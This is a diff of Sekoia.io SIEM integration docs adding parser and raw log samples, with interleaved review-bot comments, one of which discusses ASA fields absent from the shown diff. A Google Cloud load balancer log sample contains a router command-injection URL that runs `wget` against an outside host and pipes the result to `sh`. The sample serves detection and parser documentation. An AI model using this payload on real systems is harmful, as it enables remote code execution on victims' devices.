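Review bot: both ICMP samples parse `faddr 1.2.3.4/14` to `source` and `laddr 172.1.1.2/0` to `destination`, but `gaddr 172.1.1.1/0`, the translated (global) address, is dropped entirely and does not appear in `related.ip` either. ECS provides `destination.nat.ip` / `source.nat.ip` for exactly this, and losing the NAT address makes it impossible to pivot from the public address seen by the peer to the inside host. The raw-sample file added in the second hunk reuses the `test_ASA_302021_3` name for the `302020` message, so the rename should be applied there as well.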
diff --git a/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md b/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md index 9c7bc786b6..097d0419db 100644 --- a/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md +++ b/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cato_sase_antimalware_events.json" diff --git a/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md b/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md index 6629b51869..9ac14dbb56 100644 
--- a/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md +++ b/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_click_permitted.json" @@ -195,6 +195,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "cluster": { "id": "pharmtech_hosted" }, + "completely_rewritten": true, "email": { "to": { "address": [ 
@@ -294,6 +295,7 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.product` | `keyword` | The product name of the observer. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`proofpoint.tap.cluster.id` | `keyword` | The name of the cluster which processed the message | +|`proofpoint.tap.completely_rewritten` | `boolean` | Falg if the message was rewritten | |`proofpoint.tap.email.to.address` | `array` | The list of recipients from the TO header | |`proofpoint.tap.modules` | `array` | The list of modules which processed the message | |`proofpoint.tap.threat.classifications` | `array` | The list of classifications of the threat | diff --git a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md index cfe11712fe..3e05cd4fc6 100644 --- a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md +++ b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. 
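Review bot: typo in the new field description, `Falg if the message was rewritten`; suggest `Flag set when the message was completely rewritten by URL Defense`, or at minimum `Flag`. The `boolean` type matches the `"completely_rewritten": true` value in the sample above, so only the description needs fixing.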
@@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event.json" @@ -255,7 +254,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -289,3 +288,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/SesameIT/jizo). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md new file mode 100644 index 0000000000..c2e8efdc07 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md 
@@ -0,0 +1,153 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "event" + + + ```json + { + "timestamp": "2024-06-27T12:56:49.920281+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "1.2.3.4", + "src_port": 8000, + "dest_ip": "10.0.4.4", + "dest_port": 4000, + "proto": "TCP", + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2221014, + "rev": 1, + "signature": "ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)", + "category": "A Network Trojan was detected", + "severity": 3, + "metadata": { + "affected_product": [ + "machine1" + ], + "attack_target": [ + "Client_Endpoint" + ], + "signature_severity": [ + "Major" + ] + } + }, + "app_proto": "smb", + "flow": { + "pkts_toserver": 4, + "pkts_toclient": 4, + "bytes_toserver": 265, + "bytes_toclient": 701, + "start": "2024-01-07T19:54:41.492407+0000" + } + } + ``` + + + +=== "http_event" + + + ```json + { + "timestamp": "2024-06-27T13:25:18.431133+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "10.20.30.101", + "src_port": 49778, + "dest_ip": "203.176.135.102", + "dest_port": 8082, + "proto": "TCP", + "http": { + "http_port": 8082, + "url": "/libhtp::request_uri_not_seen", + "http_server_agent": "KSKJJGJ", + "http_content_type": "text/plain", + "status": 200, + "response_length": 3, + "request_length": 0 + }, + "app_proto": "http", + "flow": { + "pkts_toserver": 8, + "pkts_toclient": 7, + "bytes_toserver": 5427, + "bytes_toclient": 502, + "start": "2024-06-27T13:11:21.595110+0000" + }, + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2100494, + "rev": 12, + "signature": "GPL 
ATTACK_RESPONSE command completed", + "category": "Potentially Bad Traffic", + "severity": 2, + "metadata": { + "updated_at": [ + "2010_09_23" + ], + "created_at": [ + "2010_09_23" + ] + } + } + } + ``` + + + +=== "rule" + + + ```json + { + "timestamp": "2024-06-27T12:56:49.920281+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "1.2.3.4", + "src_port": 8000, + "dest_ip": "10.0.4.4", + "dest_port": 4000, + "proto": "TCP", + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2221014, + "rev": 1, + "signature": "ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)", + "category": "A Network Trojan was detected", + "severity": 3, + "metadata": { + "affected_product": [ + "machine1" + ], + "attack_target": [ + "Client_Endpoint" + ], + "signature_severity": [ + "Major" + ] + } + }, + "app_proto": "smb", + "flow": { + "pkts_toserver": 4, + "pkts_toclient": 4, + "bytes_toserver": 265, + "bytes_toclient": 701, + "start": "2024-01-07T19:54:41.492407+0000" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md b/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md index 4957e1a356..ee65fdf60e 100644 --- a/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md +++ b/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md 
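Review bot: the `event` and `rule` raw samples in this new file are byte-for-byte identical (same `flow_id 1017644745558273`, same `signature_id 2221014`, same timestamps), so the second one adds no parser coverage. Either drop `rule` or replace it with a distinct event type; the file currently only exercises `event_type: alert`, and a non-alert EVE record (flow, http, dns) would be a more useful third sample for a Suricata-style source.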
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Block1.json" diff --git a/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md b/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md index 66ac19eb14..cf353fe630 100644 --- a/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md +++ b/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event.json" diff --git a/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md b/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md index 981bc139a1..3f73bda531 100644 --- a/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md +++ b/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_conf_events_1.json" diff --git a/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md b/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md index e6af78cabe..77147fa35d 100644 --- a/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md +++ b/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_user_exec_in_pod.json" diff --git a/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md new file mode 100644 index 0000000000..de8b80aad3 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md 
@@ -0,0 +1,275 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Web logs` | None | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `` | +| Category | `web` | +| Type | `access` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "accept_with_port.json" + + ```json + + { + "message": "{\"httpRequest\": {\"latency\": \"0.001115s\", \"protocol\": \"HTTP/1.1\", \"remoteIp\": \"1.2.3.4:49194\", \"requestMethod\": \"GET\", \"requestSize\": \"201\", \"requestUrl\": \"http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)\", \"responseSize\": \"155\", \"status\": 503, \"userAgent\": \"Go-http-client/1.1\"}, \"insertId\": \"1t7m3mbf14kc7c\", \"jsonPayload\": {\"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"backendTargetProjectNumber\": \"projects/111111111111\", \"enforcedSecurityPolicy\": {\"configuredAction\": \"THROTTLE\", \"name\": \"policy-name\", \"outcome\": \"ACCEPT\", \"priority\": 2147483646, \"rateLimitAction\": {\"key\": \"1.2.3.4\", \"outcome\": \"RATE_LIMIT_THRESHOLD_CONFORM\"}}, \"proxyStatus\": \"error=\\\"destination_unavailable\\\"; 
details=\\\"failed_to_pick_backend\\\"\"}, \"logName\": \"projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests\", \"receiveTimestamp\": \"2024-08-26T15:30:31.15568806Z\", \"resource\": {\"labels\": {\"backend_name\": \"\", \"backend_scope\": \"UNKNOWN\", \"backend_scope_type\": \"UNKNOWN\", \"backend_target_name\": \"backend-name\", \"backend_target_type\": \"BACKEND_SERVICE\", \"backend_type\": \"UNKNOWN\", \"forwarding_rule_name\": \"forwarding_rule-name\", \"matched_url_path_rule\": \"UNMATCHED\", \"network_name\": \"default\", \"project_id\": \"integration-gcloadbalancing\", \"region\": \"europe-west9\", \"target_proxy_name\": \"proxy-name\", \"url_map_name\": \"url_map-name\"}, \"type\": \"http_external_regional_lb_rule\"}, \"severity\": \"WARNING\", \"timestamp\": \"2024-08-26T15:30:27.62577Z\"}", + "event": { + "action": "THROTTLE", + "category": [ + "web" + ], + "outcome": "ACCEPT", + "type": [ + "access" + ] + }, + "@timestamp": "2024-08-26T15:30:27.625770Z", + "cloud": { + "project": { + "id": "integration-gcloadbalancing" + }, + "provider": "Google Cloud", + "service": { + "name": "Load Balancing" + } + }, + "google_cloud_load_balancing": { + "insertId": "1t7m3mbf14kc7c", + "logName": "projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests", + "priority": "2147483646", + "receiveTimestamp": "2024-08-26T15:30:31.15568806Z", + "severity": "WARNING" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 503 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "rule": { + "name": "policy-name" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 49194 + }, + "url": { + "domain": "5.6.7.8", + "original": "http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "path": "/cgi-bin/luci/;stok=/locale", + "port": 80, + "query": 
"form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "scheme": "http" + } + } + + ``` + + +=== "accepted.json" + + ```json + + { + "message": "{\"httpRequest\": {\"latency\": \"0.006023s\", \"remoteIp\": \"1.2.3.4\", \"requestMethod\": \"GET\", \"requestSize\": \"1012\", \"requestUrl\": \"https://example.org/api-services/api/ping\", \"responseSize\": \"307\", \"serverIp\": \"5.6.7.8\", \"status\": 200, \"userAgent\": \"Apache-HttpClient/5.2.1 (Java/21.0.1)\"}, \"insertId\": \"1t7m3mbf14kc7c\", \"jsonPayload\": {\"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"backendTargetProjectNumber\": \"projects/12345678\", \"cacheDecision\": [\"RESPONSE_HAS_CONTENT_TYPE\", \"REQUEST_HAS_AUTHORIZATION\", \"CACHE_MODE_USE_ORIGIN_HEADERS\"], \"enforcedSecurityPolicy\": {\"configuredAction\": \"ALLOW\", \"name\": \"cloud-armor-rule-policy-name-01\", \"outcome\": \"ACCEPT\", \"priority\": 2147483647}, \"remoteIp\": \"1.2.3.4\", \"securityPolicyRequestData\": {\"remoteIpInfo\": {\"regionCode\": \"BE\"}, \"tlsJa3Fingerprint\": \"c691c8ec005d3a6a8aafc394edf6c1a3\"}, \"statusDetails\": \"response_sent_by_backend\"}, \"logName\": \"projects/google-project/logs/requests\", \"receiveTimestamp\": \"2024-02-20T15:03:01.755764847Z\", \"resource\": {\"labels\": {\"backend_service_name\": \"google-project-backend-03\", \"forwarding_rule_name\": \"google-project-ip-pub-03\", \"project_id\": \"google-project\", \"target_proxy_name\": \"google-project-lb-03-target-proxy\", \"url_map_name\": \"google-project-lb-03\", \"zone\": \"global\"}, \"type\": \"http_load_balancer\"}, \"severity\": \"INFO\", \"spanId\": \"74f69181f79f8236\", \"timestamp\": \"2024-02-20T15:03:00.867759Z\", \"trace\": \"projects/google-project/traces/ff592ffa0c72bac07e758a3851fd44f5\"}", + "event": { + "action": "ALLOW", + "category": [ + "web" + ], + "outcome": "ACCEPT", + "type": [ + "access" + ] + }, + "@timestamp": 
"2024-02-20T15:03:00.867759Z", + "cloud": { + "project": { + "id": "google-project" + }, + "provider": "Google Cloud", + "region": "global", + "service": { + "name": "Load Balancing" + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "google_cloud_load_balancing": { + "insertId": "1t7m3mbf14kc7c", + "logName": "projects/google-project/logs/requests", + "priority": "2147483647", + "receiveTimestamp": "2024-02-20T15:03:01.755764847Z", + "severity": "INFO" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "cloud-armor-rule-policy-name-01" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.org", + "original": "https://example.org/api-services/api/ping", + "path": "/api-services/api/ping", + "port": 443, + "registered_domain": "example.org", + "scheme": "https", + "top_level_domain": "org" + } + } + + ``` + + +=== "denied.json" + + ```json + + { + "message": "{\"insertId\": \"tyvh8vfi0k1di\", \"jsonPayload\": {\"remoteIp\": \"1.2.3.4\", \"backendTargetProjectNumber\": \"projects/123456789\", \"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"statusDetails\": \"denied_by_security_policy\", \"cacheDecision\": [\"RESPONSE_HAS_CONTENT_TYPE\", \"REQUEST_HAS_IF_NONE_MATCH\", \"CACHE_MODE_USE_ORIGIN_HEADERS\"], \"enforcedSecurityPolicy\": {\"priority\": 1000, \"outcome\": \"DENY\", \"configuredAction\": \"DENY\", \"name\": \"block-all-http-requests\"}}, \"httpRequest\": {\"requestMethod\": \"GET\", \"requestUrl\": \"http://malicious.site/url\", \"requestSize\": \"488\", \"status\": 403, \"responseSize\": \"258\", \"userAgent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\", \"remoteIp\": \"1.2.3.4\", \"latency\": \"0.102957s\"}, \"resource\": {\"type\": 
\"http_load_balancer\", \"labels\": {\"target_proxy_name\": \"http-lb-proxy\", \"project_id\": \"project_id\", \"zone\": \"global\", \"url_map_name\": \"http-load-balancer\", \"forwarding_rule_name\": \"http-content-rule\", \"backend_service_name\": \"backend-service\"}}, \"timestamp\": \"2023-12-25T07:17:32.061039Z\", \"severity\": \"WARNING\", \"logName\": \"projects/project_id/logs/requests\", \"trace\": \"projects/project_id/traces/15dc480f7c7879c404b6b33843099866\", \"receiveTimestamp\": \"2023-12-25T07:17:33.457621996Z\", \"spanId\": \"25c549956d7c28e2\"}", + "event": { + "action": "DENY", + "category": [ + "web" + ], + "outcome": "DENY", + "type": [ + "access" + ] + }, + "@timestamp": "2023-12-25T07:17:32.061039Z", + "cloud": { + "project": { + "id": "project_id" + }, + "provider": "Google Cloud", + "region": "global", + "service": { + "name": "Load Balancing" + } + }, + "google_cloud_load_balancing": { + "insertId": "tyvh8vfi0k1di", + "logName": "projects/project_id/logs/requests", + "priority": "1000", + "receiveTimestamp": "2023-12-25T07:17:33.457621996Z", + "severity": "WARNING" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 403 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "rule": { + "name": "block-all-http-requests" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "malicious.site", + "original": "http://malicious.site/url", + "path": "/url", + "port": 80, + "registered_domain": "malicious.site", + "scheme": "http", + "top_level_domain": "site" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. 
| +|`cloud.project.id` | `keyword` | The cloud project id. | +|`cloud.provider` | `keyword` | Name of the cloud provider. | +|`cloud.region` | `keyword` | Region in which this host, resource, or service is located. | +|`cloud.service.name` | `keyword` | The cloud service name. | +|`destination.ip` | `ip` | IP address of the destination. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`google_cloud_load_balancing.insertId` | `keyword` | A unique identifier for the log entry. | +|`google_cloud_load_balancing.logName` | `keyword` | The resource name of the log to which this log entry belongs to. | +|`google_cloud_load_balancing.priority` | `keyword` | | +|`google_cloud_load_balancing.receiveTimestamp` | `keyword` | The time the log entry was received by Logging. | +|`google_cloud_load_balancing.severity` | `keyword` | The severity of the log entry. | +|`google_cloud_load_balancing.statusDetails` | `keyword` | | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.request.referrer` | `keyword` | Referrer for this HTTP request. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`rule.name` | `keyword` | Rule name | +|`source.geo.region_iso_code` | `keyword` | Region ISO code. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. 
| + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Google Cloud/Google Cloud Load Balancing). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md new file mode 100644 index 0000000000..a0ca8cd2b5 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md 
@@ -0,0 +1,182 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "accept_with_port" + + + ```json + { + "httpRequest": { + "latency": "0.001115s", + "protocol": "HTTP/1.1", + "remoteIp": "1.2.3.4:49194", + "requestMethod": "GET", + "requestSize": "201", + "requestUrl": "http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "responseSize": "155", + "status": 503, + "userAgent": "Go-http-client/1.1" + }, + "insertId": "1t7m3mbf14kc7c", + "jsonPayload": { + "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "backendTargetProjectNumber": "projects/111111111111", + "enforcedSecurityPolicy": { + "configuredAction": "THROTTLE", + "name": "policy-name", + "outcome": "ACCEPT", + "priority": 2147483646, + "rateLimitAction": { + "key": "1.2.3.4", + "outcome": "RATE_LIMIT_THRESHOLD_CONFORM" + } + }, + "proxyStatus": "error=\"destination_unavailable\"; details=\"failed_to_pick_backend\"" + }, + "logName": "projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests", + "receiveTimestamp": "2024-08-26T15:30:31.15568806Z", + "resource": { + "labels": { + "backend_name": "", + "backend_scope": "UNKNOWN", + "backend_scope_type": "UNKNOWN", + "backend_target_name": "backend-name", + "backend_target_type": "BACKEND_SERVICE", + "backend_type": "UNKNOWN", + "forwarding_rule_name": "forwarding_rule-name", + "matched_url_path_rule": "UNMATCHED", + "network_name": "default", + "project_id": "integration-gcloadbalancing", + "region": "europe-west9", + "target_proxy_name": "proxy-name", + "url_map_name": "url_map-name" + }, + 
"type": "http_external_regional_lb_rule" + }, + "severity": "WARNING", + "timestamp": "2024-08-26T15:30:27.62577Z" + } + ``` + + + +=== "accepted" + + + ```json + { + "httpRequest": { + "latency": "0.006023s", + "remoteIp": "1.2.3.4", + "requestMethod": "GET", + "requestSize": "1012", + "requestUrl": "https://example.org/api-services/api/ping", + "responseSize": "307", + "serverIp": "5.6.7.8", + "status": 200, + "userAgent": "Apache-HttpClient/5.2.1 (Java/21.0.1)" + }, + "insertId": "1t7m3mbf14kc7c", + "jsonPayload": { + "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "backendTargetProjectNumber": "projects/12345678", + "cacheDecision": [ + "RESPONSE_HAS_CONTENT_TYPE", + "REQUEST_HAS_AUTHORIZATION", + "CACHE_MODE_USE_ORIGIN_HEADERS" + ], + "enforcedSecurityPolicy": { + "configuredAction": "ALLOW", + "name": "cloud-armor-rule-policy-name-01", + "outcome": "ACCEPT", + "priority": 2147483647 + }, + "remoteIp": "1.2.3.4", + "securityPolicyRequestData": { + "remoteIpInfo": { + "regionCode": "BE" + }, + "tlsJa3Fingerprint": "c691c8ec005d3a6a8aafc394edf6c1a3" + }, + "statusDetails": "response_sent_by_backend" + }, + "logName": "projects/google-project/logs/requests", + "receiveTimestamp": "2024-02-20T15:03:01.755764847Z", + "resource": { + "labels": { + "backend_service_name": "google-project-backend-03", + "forwarding_rule_name": "google-project-ip-pub-03", + "project_id": "google-project", + "target_proxy_name": "google-project-lb-03-target-proxy", + "url_map_name": "google-project-lb-03", + "zone": "global" + }, + "type": "http_load_balancer" + }, + "severity": "INFO", + "spanId": "74f69181f79f8236", + "timestamp": "2024-02-20T15:03:00.867759Z", + "trace": "projects/google-project/traces/ff592ffa0c72bac07e758a3851fd44f5" + } + ``` + + + +=== "denied" + + + ```json + { + "insertId": "tyvh8vfi0k1di", + "jsonPayload": { + "remoteIp": "1.2.3.4", + 